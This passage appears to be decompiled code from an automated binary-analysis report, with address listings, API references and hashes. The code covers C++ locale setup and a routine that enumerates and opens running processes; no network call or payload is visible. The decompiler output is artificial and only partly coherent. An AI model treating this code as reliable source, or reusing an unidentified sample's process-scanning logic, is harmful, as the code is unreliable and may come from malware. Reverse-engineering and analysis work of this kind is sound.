                                                                                                									__eflags = _t124 - _t92;
                                                                                                									_t122 =  <  ? _t92 : _t124;
                                                                                                								} else {
                                                                                                									_t122 = 0x7fffffff;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t122 = 0x7fffffff;
                                                                                                							}
                                                                                                							_t93 = _t122 + 1;
                                                                                                							_push(_t165);
                                                                                                							__eflags = _t93 - 0x1000;
                                                                                                							if(_t93 < 0x1000) {
                                                                                                								__eflags = _t93;
                                                                                                								if(_t93 == 0) {
                                                                                                									_t165 = 0;
                                                                                                									__eflags = 0;
                                                                                                								} else {
                                                                                                									_t165 = LocalAlloc(0x40, _t93);
                                                                                                								}
                                                                                                								goto L46;
                                                                                                							} else {
                                                                                                								_t132 = _t93 + 0x23;
                                                                                                								__eflags = _t132 - _t93;
                                                                                                								if(__eflags <= 0) {
                                                                                                									L55:
                                                                                                									E00F72A40(_t122, _t143, _t148, _t165, __eflags);
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									_t144 = _v108;
                                                                                                									_t87 = _t144;
                                                                                                									_push(_t156);
                                                                                                									_t157 = _t132;
                                                                                                									_push(_t148);
                                                                                                									_t73 = _t87 + 1; // 0x1
                                                                                                									_t149 = _t73;
                                                                                                									 *(_t157 + 0x10) = 0;
                                                                                                									 *((intOrPtr*)(_t157 + 0x14)) = 0xf;
                                                                                                									 *_t157 = 0;
                                                                                                									do {
                                                                                                										_t133 =  *_t87;
                                                                                                										_t87 = _t87 + 1;
                                                                                                										__eflags = _t133;
                                                                                                									} while (_t133 != 0);
                                                                                                									_t88 = _t87 - _t149;
                                                                                                									__eflags = _t88;
                                                                                                									_push(_t88);
                                                                                                									_push(_t144);
                                                                                                									L29();
                                                                                                									return _t157;
                                                                                                								} else {
                                                                                                									_t102 = LocalAlloc(0x40, _t132);
                                                                                                									__eflags = _t102;
                                                                                                									if(__eflags == 0) {
                                                                                                										L53:
                                                                                                										E00F98D9C(_t122, _t132, _t143, _t148, __eflags);
                                                                                                										goto L54;
                                                                                                									} else {
                                                                                                										_t165 = _t102 + 0x00000023 & 0xffffffe0;
                                                                                                										_v8 = _t102;
                                                                                                										L46:
                                                                                                										_t156[4] = _t148;
                                                                                                										_t156[5] = _t122;
                                                                                                										E00F96240(_t165, _v96, _t148);
                                                                                                										_t95 = _v104;
                                                                                                										 *((char*)(_t148 + _t165)) = 0;
                                                                                                										__eflags = _t95 - 0x10;
                                                                                                										if(_t95 < 0x10) {
                                                                                                											L52:
                                                                                                											 *_t156 = _t165;
                                                                                                											return _t156;
                                                                                                										} else {
                                                                                                											_t136 =  *_t156;
                                                                                                											__eflags = _t95 + 1 - 0x1000;
                                                                                                											if(_t95 + 1 < 0x1000) {
                                                                                                												L50:
                                                                                                												__eflags = _t136;
                                                                                                												if(_t136 != 0) {
                                                                                                													LocalFree(_t136);
                                                                                                												}
                                                                                                												goto L52;
                                                                                                											} else {
                                                                                                												_t143 =  *(_t136 - 4);
                                                                                                												_t132 = _t136 - _t143;
                                                                                                												__eflags = _t132 - 4 - 0x1f;
                                                                                                												if(__eflags > 0) {
                                                                                                													goto L53;
                                                                                                												} else {
                                                                                                													_t136 = _t143;
                                                                                                													goto L50;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t126 = _t156;
                                                                                                						__eflags = _t132 - 0x10;
                                                                                                						if(_t132 >= 0x10) {
                                                                                                							_t126 =  *_t156;
                                                                                                						}
                                                                                                						_t156[4] = _t148;
                                                                                                						E00F95C10(_t126, _v96, _t148);
                                                                                                						 *((char*)(_t126 + _t148)) = 0;
                                                                                                						return _t156;
                                                                                                					}
                                                                                                				} else {
                                                                                                					E00F83F0F(_t122, _t131, _t147,  &_v80, 0x3f, _t155);
                                                                                                					_t171 = _t171 + 0xc;
                                                                                                					_v8 = 8;
                                                                                                					_t139 =  !=  ? _v36 :  &_v32;
                                                                                                					_t108 = "*";
                                                                                                					while(1) {
                                                                                                						_t143 =  *_t139;
                                                                                                						if(_t143 !=  *_t108) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if(_t143 == 0) {
                                                                                                							L8:
                                                                                                							_t109 = 0;
                                                                                                						} else {
                                                                                                							_t143 =  *((intOrPtr*)(_t139 + 1));
                                                                                                							_t34 = _t108 + 1; // 0x62000000
                                                                                                							if(_t143 !=  *_t34) {
                                                                                                								break;
                                                                                                							} else {
                                                                                                								_t139 = _t139 + 2;
                                                                                                								_t108 = _t108 + 2;
                                                                                                								if(_t143 != 0) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L8;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L10:
                                                                                                						if(_t109 != 0) {
                                                                                                							_push(0);
                                                                                                							_push( *(_t122 + 4));
                                                                                                							_push(0x3f);
                                                                                                							_push( &_v80);
                                                                                                							E00F83F45(_t143, _t147, _t155, __eflags, _t185);
                                                                                                							_t171 = _t171 + 0x10;
                                                                                                							( *(_t122 + 4))[4] = 0x3f;
                                                                                                							__eflags =  *((intOrPtr*)(_t147 + 0x14)) - 0x10;
                                                                                                							if( *((intOrPtr*)(_t147 + 0x14)) >= 0x10) {
                                                                                                								_t147 =  *_t147;
                                                                                                							}
                                                                                                							_t128 =  *(_t122 + 4);
                                                                                                							_t113 = _t128[6];
                                                                                                							__eflags = _t113 - _t147;
                                                                                                							if(_t113 != _t147) {
                                                                                                								__eflags = _t113;
                                                                                                								if(_t113 != 0) {
                                                                                                									E00F9BD1B(_t113);
                                                                                                									_t171 = _t171 + 4;
                                                                                                								}
                                                                                                								_t128[6] = 0;
                                                                                                								__eflags = _t147;
                                                                                                								if(_t147 != 0) {
                                                                                                									__eflags =  *_t147;
                                                                                                									_t162 = _t147;
                                                                                                									if( *_t147 != 0) {
                                                                                                										do {
                                                                                                											_t162 = _t162 + 1;
                                                                                                											__eflags =  *_t162;
                                                                                                										} while ( *_t162 != 0);
                                                                                                									}
                                                                                                									_t155 = _t162 + 1 - _t147;
                                                                                                									_push(_t155);
                                                                                                									_t118 = E00F9BD38();
                                                                                                									_t171 = _t171 + 4;
                                                                                                									_t128[6] = _t118;
                                                                                                									__eflags = _t118;
                                                                                                									if(_t118 != 0) {
                                                                                                										E00F96240(_t118, _t147, _t155);
                                                                                                										_t171 = _t171 + 0xc;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_t122 = _v24;
                                                                                                						} else {
                                                                                                							_v17 = 1;
                                                                                                						}
                                                                                                						_v8 = 0;
                                                                                                						_t114 = E00F79300();
                                                                                                						_v28 = 0;
                                                                                                						_v8 = 0xffffffff;
                                                                                                						if(_v17 != 0) {
                                                                                                							_t52 = _t122 + 4; // 0x8bffffff
                                                                                                							_t131 =  *_t52;
                                                                                                							_t116 =  *((intOrPtr*)( *_t131 + 8))();
                                                                                                							__eflags = _t116;
                                                                                                							if(_t116 != 0) {
                                                                                                								_t143 =  *_t116;
                                                                                                								_t131 = _t116;
                                                                                                								 *( *_t116)(1);
                                                                                                							}
                                                                                                							goto L28;
                                                                                                						} else {
                                                                                                							 *[fs:0x0] = _v16;
                                                                                                							return _t114;
                                                                                                						}
                                                                                                						goto L59;
                                                                                                					}
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t109 = _t108 | 0x00000001;
                                                                                                					__eflags = _t109;
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				L59:
                                                                                                			}































































                                                                                                0x00f794f1
                                                                                                0x00f794f3
                                                                                                0x00f794f5
                                                                                                0x00f79500
                                                                                                0x00f79505
                                                                                                0x00f79506
                                                                                                0x00f79507
                                                                                                0x00f7950e
                                                                                                0x00f79512
                                                                                                0x00f79518
                                                                                                0x00f7951a
                                                                                                0x00f7951d
                                                                                                0x00f7951f
                                                                                                0x00f79523
                                                                                                0x00f7952b
                                                                                                0x00f7952e
                                                                                                0x00f79531
                                                                                                0x00f79538
                                                                                                0x00f7953b
                                                                                                0x00f79541
                                                                                                0x00f79543
                                                                                                0x00f79543
                                                                                                0x00f79547
                                                                                                0x00f7954a
                                                                                                0x00f7954f
                                                                                                0x00f79553
                                                                                                0x00f7955a
                                                                                                0x00f7955e
                                                                                                0x00f79562
                                                                                                0x00f79569
                                                                                                0x00f7956d
                                                                                                0x00f79573
                                                                                                0x00f7957a
                                                                                                0x00f7957e
                                                                                                0x00f79582
                                                                                                0x00f79585
                                                                                                0x00f79589
                                                                                                0x00f7958d
                                                                                                0x00f79590
                                                                                                0x00f79593
                                                                                                0x00f79597
                                                                                                0x00f7959a
                                                                                                0x00f7959d
                                                                                                0x00f795a3
                                                                                                0x00f796bf
                                                                                                0x00f796c4
                                                                                                0x00f796c9
                                                                                                0x00f796ca
                                                                                                0x00f796cb
                                                                                                0x00f796cc
                                                                                                0x00f796cd
                                                                                                0x00f796ce
                                                                                                0x00f796cf
                                                                                                0x00f796d0
                                                                                                0x00f796d1
                                                                                                0x00f796d2
                                                                                                0x00f796d3
                                                                                                0x00f796d5
                                                                                                0x00f796d6
                                                                                                0x00f796da
                                                                                                0x00f796dd
                                                                                                0x00f796e1
                                                                                                0x00f796e3
                                                                                                0x00f7970c
                                                                                                0x00f79712
                                                                                                0x00f797e1
                                                                                                0x00f797e1
                                                                                                0x00000000
                                                                                                0x00f79718
                                                                                                0x00f7971a
                                                                                                0x00f7971d
                                                                                                0x00f79723
                                                                                                0x00f79733
                                                                                                0x00f79737
                                                                                                0x00f79739
                                                                                                0x00f79742
                                                                                                0x00f79745
                                                                                                0x00f79747
                                                                                                0x00f7973b
                                                                                                0x00f7973b
                                                                                                0x00f7973b
                                                                                                0x00f79725
                                                                                                0x00f79725
                                                                                                0x00f79725
                                                                                                0x00f7974a
                                                                                                0x00f7974d
                                                                                                0x00f7974e
                                                                                                0x00f79753
                                                                                                0x00f79778
                                                                                                0x00f7977a
                                                                                                0x00f79789
                                                                                                0x00f79789
                                                                                                0x00f7977c
                                                                                                0x00f79785
                                                                                                0x00f79785
                                                                                                0x00000000
                                                                                                0x00f79755
                                                                                                0x00f79755
                                                                                                0x00f79758
                                                                                                0x00f7975a
                                                                                                0x00f797e6
                                                                                                0x00f797e6
                                                                                                0x00f797eb
                                                                                                0x00f797ec
                                                                                                0x00f797ed
                                                                                                0x00f797ee
                                                                                                0x00f797ef
                                                                                                0x00f797f0
                                                                                                0x00f797f4
                                                                                                0x00f797f6
                                                                                                0x00f797f7
                                                                                                0x00f797f9
                                                                                                0x00f797fa
                                                                                                0x00f797fa
                                                                                                0x00f797fd
                                                                                                0x00f79804
                                                                                                0x00f7980b
                                                                                                0x00f79810
                                                                                                0x00f79810
                                                                                                0x00f79812
                                                                                                0x00f79813
                                                                                                0x00f79813
                                                                                                0x00f79817
                                                                                                0x00f79817
                                                                                                0x00f7981b
                                                                                                0x00f7981c
                                                                                                0x00f7981d
                                                                                                0x00f79826
                                                                                                0x00f79760
                                                                                                0x00f79763
                                                                                                0x00f79769
                                                                                                0x00f7976b
                                                                                                0x00f797dc
                                                                                                0x00f797dc
                                                                                                0x00000000
                                                                                                0x00f7976d
                                                                                                0x00f79770
                                                                                                0x00f79773
                                                                                                0x00f7978b
                                                                                                0x00f79790
                                                                                                0x00f79794
                                                                                                0x00f79797
                                                                                                0x00f7979c
                                                                                                0x00f797a3
                                                                                                0x00f797a7
                                                                                                0x00f797aa
                                                                                                0x00f797d0
                                                                                                0x00f797d0
                                                                                                0x00f797d9
                                                                                                0x00f797ac
                                                                                                0x00f797ac
                                                                                                0x00f797af
                                                                                                0x00f797b4
                                                                                                0x00f797c5
                                                                                                0x00f797c5
                                                                                                0x00f797c7
                                                                                                0x00f797ca
                                                                                                0x00f797ca
                                                                                                0x00000000
                                                                                                0x00f797b6
                                                                                                0x00f797b6
                                                                                                0x00f797b9
                                                                                                0x00f797be
                                                                                                0x00f797c1
                                                                                                0x00000000
                                                                                                0x00f797c3
                                                                                                0x00f797c3
                                                                                                0x00000000
                                                                                                0x00f797c3
                                                                                                0x00f797c1
                                                                                                0x00f797b4
                                                                                                0x00f797aa
                                                                                                0x00f7976b
                                                                                                0x00f7975a
                                                                                                0x00f79753
                                                                                                0x00f796e5
                                                                                                0x00f796e5
                                                                                                0x00f796e7
                                                                                                0x00f796ea
                                                                                                0x00f796ec
                                                                                                0x00f796ec
                                                                                                0x00f796f3
                                                                                                0x00f796f7
                                                                                                0x00f796ff
                                                                                                0x00f79709
                                                                                                0x00f79709
                                                                                                0x00f795a9
                                                                                                0x00f795b0
                                                                                                0x00f795b5
                                                                                                0x00f795b8
                                                                                                0x00f795c4
                                                                                                0x00f795c7
                                                                                                0x00f795d0
                                                                                                0x00f795d0
                                                                                                0x00f795d4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f795d8
                                                                                                0x00f795ec
                                                                                                0x00f795ec
                                                                                                0x00f795da
                                                                                                0x00f795da
                                                                                                0x00f795dd
                                                                                                0x00f795e0
                                                                                                0x00000000
                                                                                                0x00f795e2
                                                                                                0x00f795e2
                                                                                                0x00f795e5
                                                                                                0x00f795ea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f795ea
                                                                                                0x00f795e0
                                                                                                0x00f795f5
                                                                                                0x00f795f7
                                                                                                0x00f795ff
                                                                                                0x00f79601
                                                                                                0x00f79607
                                                                                                0x00f79609
                                                                                                0x00f7960a
                                                                                                0x00f79612
                                                                                                0x00f79615
                                                                                                0x00f7961c
                                                                                                0x00f79620
                                                                                                0x00f79622
                                                                                                0x00f79622
                                                                                                0x00f79624
                                                                                                0x00f79627
                                                                                                0x00f7962a
                                                                                                0x00f7962c
                                                                                                0x00f7962e
                                                                                                0x00f79630
                                                                                                0x00f79633
                                                                                                0x00f79638
                                                                                                0x00f79638
                                                                                                0x00f7963b
                                                                                                0x00f79642
                                                                                                0x00f79644
                                                                                                0x00f79646
                                                                                                0x00f79649
                                                                                                0x00f7964b
                                                                                                0x00f79650
                                                                                                0x00f79650
                                                                                                0x00f79651
                                                                                                0x00f79651
                                                                                                0x00f79650
                                                                                                0x00f79657
                                                                                                0x00f79659
                                                                                                0x00f7965a
                                                                                                0x00f7965f
                                                                                                0x00f79662
                                                                                                0x00f79665
                                                                                                0x00f79667
                                                                                                0x00f7966c
                                                                                                0x00f79671
                                                                                                0x00f79671
                                                                                                0x00f79667
                                                                                                0x00f79644
                                                                                                0x00f79674
                                                                                                0x00f795f9
                                                                                                0x00f795f9
                                                                                                0x00f795f9
                                                                                                0x00f79677
                                                                                                0x00f7967e
                                                                                                0x00f79683
                                                                                                0x00f7968a
                                                                                                0x00f79695
                                                                                                0x00f796ab
                                                                                                0x00f796ab
                                                                                                0x00f796b0
                                                                                                0x00f796b3
                                                                                                0x00f796b5
                                                                                                0x00f796b7
                                                                                                0x00f796b9
                                                                                                0x00f796bd
                                                                                                0x00f796bd
                                                                                                0x00000000
                                                                                                0x00f79697
                                                                                                0x00f7969a
                                                                                                0x00f796a8
                                                                                                0x00f796a8
                                                                                                0x00000000
                                                                                                0x00f79695
                                                                                                0x00f795f0
                                                                                                0x00f795f2
                                                                                                0x00f795f2
                                                                                                0x00000000
                                                                                                0x00f795f2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • std::locale::_Init.LIBCPMT ref: 00F79523
                                                                                                  • Part of subcall function 00F854A4: __EH_prolog3.LIBCMT ref: 00F854AB
                                                                                                  • Part of subcall function 00F854A4: std::_Lockit::_Lockit.LIBCPMT ref: 00F854B6
                                                                                                  • Part of subcall function 00F854A4: std::locale::_Setgloballocale.LIBCPMT ref: 00F854D1
                                                                                                  • Part of subcall function 00F854A4: std::_Lockit::~_Lockit.LIBCPMT ref: 00F85527
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7954A
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F795B0
                                                                                                • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00F7960A
                                                                                                  • Part of subcall function 00F83F45: __EH_prolog3.LIBCMT ref: 00F83F4C
                                                                                                  • Part of subcall function 00F83F45: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F83F93
                                                                                                  • Part of subcall function 00F83F45: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F83FEB
                                                                                                  • Part of subcall function 00F83F45: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F8401F
                                                                                                  • Part of subcall function 00F83F45: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F84073
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$InitLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 1282965664-1405518554
                                                                                                • Opcode ID: 8809585c413fc0939ecf53fe49d61da8cb088326b314d72b92724093edc439d2
                                                                                                • Instruction ID: e617215f034b18cab6783a8f4d3c4d0b5051ecab22de6f8cc4bca3e88fc0e2b7
                                                                                                • Opcode Fuzzy Hash: 8809585c413fc0939ecf53fe49d61da8cb088326b314d72b92724093edc439d2
                                                                                                • Instruction Fuzzy Hash: F851D870D08284DFDF11DF68C98579EBFF4AF15314F188199D848AB382E7759A04D7A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E00F73610(void* __ebx, int __ecx, void* __edi, char _a4, long _a8, char _a24, char _a36, signed int _a524, void* _a528, signed int _a556, void* _a560, char _a568, void* _a604) {
                                                                                                				int _v4;
                                                                                                				signed int _v12;
                                                                                                				int _v16;
                                                                                                				int _v20;
                                                                                                				void* _v24;
                                                                                                				void* _v28;
                                                                                                				void* _v32;
                                                                                                				char _v36;
                                                                                                				void* _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				void* _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				char _v56;
                                                                                                				intOrPtr* _v60;
                                                                                                				void* _v64;
                                                                                                				void* _v68;
                                                                                                				char _v84;
                                                                                                				intOrPtr* _v88;
                                                                                                				char _v112;
                                                                                                				char _v532;
                                                                                                				char _v1136;
                                                                                                				void* _v1280;
                                                                                                				char _v1288;
                                                                                                				signed int _v1292;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t138;
                                                                                                				signed int _t139;
                                                                                                				int _t142;
                                                                                                				signed int _t143;
                                                                                                				signed int _t152;
                                                                                                				signed int _t153;
                                                                                                				void* _t155;
                                                                                                				struct tagPROCESSENTRY32W* _t158;
                                                                                                				void* _t160;
                                                                                                				signed int _t166;
                                                                                                				intOrPtr* _t169;
                                                                                                				signed int _t178;
                                                                                                				signed int _t180;
                                                                                                				signed int _t185;
                                                                                                				signed int _t189;
                                                                                                				signed int _t195;
                                                                                                				signed int _t206;
                                                                                                				short _t211;
                                                                                                				signed int _t215;
                                                                                                				intOrPtr* _t225;
                                                                                                				signed int _t226;
                                                                                                				signed int _t232;
                                                                                                				signed int _t234;
                                                                                                				signed int _t235;
                                                                                                				signed int _t241;
                                                                                                				WCHAR* _t246;
                                                                                                				void* _t253;
                                                                                                				intOrPtr* _t259;
                                                                                                				void* _t261;
                                                                                                				signed int _t263;
                                                                                                				long* _t266;
                                                                                                				signed int _t269;
                                                                                                				WCHAR* _t271;
                                                                                                				short* _t272;
                                                                                                				WCHAR* _t273;
                                                                                                				struct tagPROCESSENTRY32W _t274;
                                                                                                				void* _t276;
                                                                                                				void* _t278;
                                                                                                				void* _t281;
                                                                                                				signed int _t282;
                                                                                                
                                                                                                				_t219 = __ecx;
                                                                                                				_t273 =  &_v532;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb57e0);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t278 = _t276 - 0x208;
                                                                                                				_t138 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t139 = _t138 ^ _t273;
                                                                                                				_a524 = _t139;
                                                                                                				_push(__ebx);
                                                                                                				_push(_t139);
                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                				_t259 = __ecx;
                                                                                                				_v16 = __ecx;
                                                                                                				_v20 = __ecx;
                                                                                                				 *__ecx = 0xfc6f8c;
                                                                                                				 *(__ecx + 4) = 0;
                                                                                                				_v4 = 0;
                                                                                                				 *(__ecx + 8) = 0;
                                                                                                				_t142 = GetSystemDirectoryW(_t273, 0x105);
                                                                                                				if(_t142 == 0 || _t142 >= 0x105) {
                                                                                                					_t215 = 0;
                                                                                                					__eflags = 0;
                                                                                                					goto L13;
                                                                                                				} else {
                                                                                                					_t225 = E00F72170(_t219);
                                                                                                					if(_t225 == 0) {
                                                                                                						_push(0x80004005);
                                                                                                						E00F71CB0();
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						_push(_t273);
                                                                                                						_t274 =  &_v1136;
                                                                                                						_push(0xffffffff);
                                                                                                						_push(0xfb5882);
                                                                                                						_push( *[fs:0x0]);
                                                                                                						_t281 = _t278 - 0x1cc;
                                                                                                						_t152 =  *0xfcf00c; // 0xfd8fa683
                                                                                                						_t153 = _t152 ^ _t274;
                                                                                                						_a556 = _t153;
                                                                                                						_push(__ebx);
                                                                                                						_push(_t264);
                                                                                                						_push(_t259);
                                                                                                						_push(_t153);
                                                                                                						 *[fs:0x0] =  &_v12;
                                                                                                						_t217 = _t225;
                                                                                                						_v60 = _t217;
                                                                                                						_v36 = _t217;
                                                                                                						_v88 = _t217;
                                                                                                						_v32 = 0;
                                                                                                						_v4 = 1;
                                                                                                						_t261 = 0;
                                                                                                						_t266 = 0;
                                                                                                						_v24 = 0;
                                                                                                						_v20 = 0;
                                                                                                						_v16 = 0;
                                                                                                						_v4 = 2;
                                                                                                						_t155 = CreateToolhelp32Snapshot(2, 0);
                                                                                                						_v28 = _t155;
                                                                                                						_v52 = 0xfc6b50;
                                                                                                						_v48 = _t155;
                                                                                                						_v4 = 3;
                                                                                                						__eflags = _t155 - 0xffffffff;
                                                                                                						if(_t155 != 0xffffffff) {
                                                                                                							E00F95A00(0,  &_a4, 0, 0x228);
                                                                                                							_t282 = _t281 + 0xc;
                                                                                                							 *_t274 = 0x22c;
                                                                                                							_t158 = _t274;
                                                                                                							Process32FirstW(_v28, _t158);
                                                                                                							__eflags = _t158;
                                                                                                							if(_t158 == 0) {
                                                                                                								L38:
                                                                                                								 *_t217 = _t261;
                                                                                                								 *(_t217 + 4) = _t266;
                                                                                                								 *((intOrPtr*)(_t217 + 8)) = _v16;
                                                                                                								_v24 = 0;
                                                                                                								_v20 = 0;
                                                                                                								_v16 = 0;
                                                                                                								_v32 = 1;
                                                                                                								_v4 = 2;
                                                                                                								_t160 = _v28;
                                                                                                								_v52 = 0xfc6b50;
                                                                                                								__eflags = _t160;
                                                                                                								if(_t160 != 0) {
                                                                                                									CloseHandle(_t160);
                                                                                                									_v48 = 0;
                                                                                                								}
                                                                                                								_v4 = 0;
                                                                                                								_t226 = _a604;
                                                                                                								__eflags = _t226;
                                                                                                								if(_t226 != 0) {
                                                                                                									__eflags = _t226 -  &_a568;
                                                                                                									_t122 = _t226 !=  &_a568;
                                                                                                									__eflags = _t122;
                                                                                                									 *((intOrPtr*)( *_t226 + 0x10))(_t250);
                                                                                                									goto L42;
                                                                                                								}
                                                                                                								goto L43;
                                                                                                							} else {
                                                                                                								do {
                                                                                                									_t166 = OpenProcess(0x410, 0, _a8);
                                                                                                									_t263 = _t166;
                                                                                                									_v44 = 0xfc6b50;
                                                                                                									_v40 = _t263;
                                                                                                									_v4 = 5;
                                                                                                									__eflags = _t263 - 0xffffffff;
                                                                                                									if(__eflags != 0) {
                                                                                                										E00F73B50(_t217,  &_v112, _t263, _t263, _t266, __eflags);
                                                                                                										_v4 = 6;
                                                                                                										__eflags = 0;
                                                                                                										_v84 = 0;
                                                                                                										_t169 =  &_a36;
                                                                                                										_v68 = 0;
                                                                                                										_t253 = _t169 + 2;
                                                                                                										_v64 = 0;
                                                                                                										_v68 = 0;
                                                                                                										_v64 = 7;
                                                                                                										do {
                                                                                                											_t232 =  *_t169;
                                                                                                											_t169 = _t169 + 2;
                                                                                                											__eflags = _t232;
                                                                                                										} while (_t232 != 0);
                                                                                                										E00F71D10(_t217,  &_v84, _t263, _t266,  &_a36, _t169 - _t253 >> 1);
                                                                                                										_v4 = 7;
                                                                                                										_v56 = _a24;
                                                                                                										_v36 = _a8;
                                                                                                										_v4 = 9;
                                                                                                										_t234 = _a604;
                                                                                                										__eflags = _t234;
                                                                                                										if(__eflags == 0) {
                                                                                                											E00F81DA5(__eflags);
                                                                                                											asm("int3");
                                                                                                											asm("int3");
                                                                                                											asm("int3");
                                                                                                											_push(_t274);
                                                                                                											_push(0xffffffff);
                                                                                                											_push(0xfb58b8);
                                                                                                											_push( *[fs:0x0]);
                                                                                                											_push(_t234);
                                                                                                											_push(_t266);
                                                                                                											_t178 =  *0xfcf00c; // 0xfd8fa683
                                                                                                											_push(_t178 ^ _t282);
                                                                                                											_t180 =  &_v1288;
                                                                                                											 *[fs:0x0] = _t180;
                                                                                                											_t269 = _t234;
                                                                                                											_v1292 = _t269;
                                                                                                											_v1280 = 0xffffffff;
                                                                                                											_t235 =  *(_t269 + 0x24);
                                                                                                											__eflags = _t235;
                                                                                                											if(_t235 != 0) {
                                                                                                												__eflags = _t235 - _t269;
                                                                                                												_t133 = _t235 != _t269;
                                                                                                												__eflags = _t133;
                                                                                                												_t180 =  *((intOrPtr*)( *_t235 + 0x10))((_t180 & 0xffffff00 | _t133) & 0x000000ff);
                                                                                                												 *(_t269 + 0x24) = 0;
                                                                                                											}
                                                                                                											 *[fs:0x0] = _v16;
                                                                                                											return _t180;
                                                                                                										} else {
                                                                                                											_t250 =  &_v36;
                                                                                                											_t185 =  *((intOrPtr*)( *((intOrPtr*)( *_t234 + 8))))(_t250,  &_v56,  &_v84,  &_v112);
                                                                                                											_t217 = _t185;
                                                                                                											_v4 = 8;
                                                                                                											E00F72D10( &_v84);
                                                                                                											_v4 = 5;
                                                                                                											E00F72D10( &_v112);
                                                                                                											__eflags = _t185;
                                                                                                											if(_t185 != 0) {
                                                                                                												__eflags = _t266 - _v16;
                                                                                                												if(_t266 == _v16) {
                                                                                                													E00F74550( &_v24, _t266,  &_a8);
                                                                                                													_t266 = _v20;
                                                                                                												} else {
                                                                                                													 *_t266 = _a8;
                                                                                                													_t266 =  &(_t266[1]);
                                                                                                													_v20 = _t266;
                                                                                                												}
                                                                                                											}
                                                                                                											_v4 = 3;
                                                                                                											_v44 = 0xfc6b50;
                                                                                                											__eflags = _t263;
                                                                                                											if(_t263 != 0) {
                                                                                                												_push(_t263);
                                                                                                												goto L35;
                                                                                                											}
                                                                                                											goto L36;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_v4 = 3;
                                                                                                										_v44 = 0xfc6b50;
                                                                                                										_push(_t166);
                                                                                                										L35:
                                                                                                										CloseHandle();
                                                                                                										_v40 = 0;
                                                                                                										goto L36;
                                                                                                									}
                                                                                                									goto L48;
                                                                                                									L36:
                                                                                                									_t189 = Process32NextW(_v28, _t274);
                                                                                                									__eflags = _t189;
                                                                                                								} while (_t189 != 0);
                                                                                                								_t261 = _v24;
                                                                                                								_t217 = _v60;
                                                                                                								goto L38;
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *_t217 = 0;
                                                                                                							 *(_t217 + 4) = 0;
                                                                                                							 *((intOrPtr*)(_t217 + 8)) = 0;
                                                                                                							_v24 = 0;
                                                                                                							_v20 = 0;
                                                                                                							_v16 = 0;
                                                                                                							_v32 = 1;
                                                                                                							_v4 = 2;
                                                                                                							_v52 = 0xfc6b50;
                                                                                                							CloseHandle(_t155);
                                                                                                							_v48 = 0;
                                                                                                							_v4 = 0;
                                                                                                							_t241 = _a604;
                                                                                                							__eflags = _t241;
                                                                                                							if(_t241 != 0) {
                                                                                                								_t250 =  *_t241;
                                                                                                								_t195 =  &_a568;
                                                                                                								__eflags = _t241 - _t195;
                                                                                                								( *_t241)[8]((_t195 & 0xffffff00 | _t241 != _t195) & 0x000000ff);
                                                                                                								L42:
                                                                                                								_a604 = 0;
                                                                                                							}
                                                                                                							L43:
                                                                                                							 *[fs:0x0] = _v12;
                                                                                                							__eflags = _a556 ^ _t274;
                                                                                                							return E00F80D7F(_a556 ^ _t274, _t250);
                                                                                                						}
                                                                                                					} else {
                                                                                                						_v16 =  *((intOrPtr*)( *_t225 + 0xc))() + 0x10;
                                                                                                						_v4 = 1;
                                                                                                						if(E00F73FC0(__ebx,  &_v16, _t273, _t273) == 0) {
                                                                                                							_t246 = _t273;
                                                                                                							_t250 =  &(_t246[1]);
                                                                                                							do {
                                                                                                								_t211 =  *_t246;
                                                                                                								_t246 =  &(_t246[1]);
                                                                                                							} while (_t211 != 0);
                                                                                                							E00F743C0(_t273,  &_v16, _t273, _t246 - _t250 >> 1);
                                                                                                						}
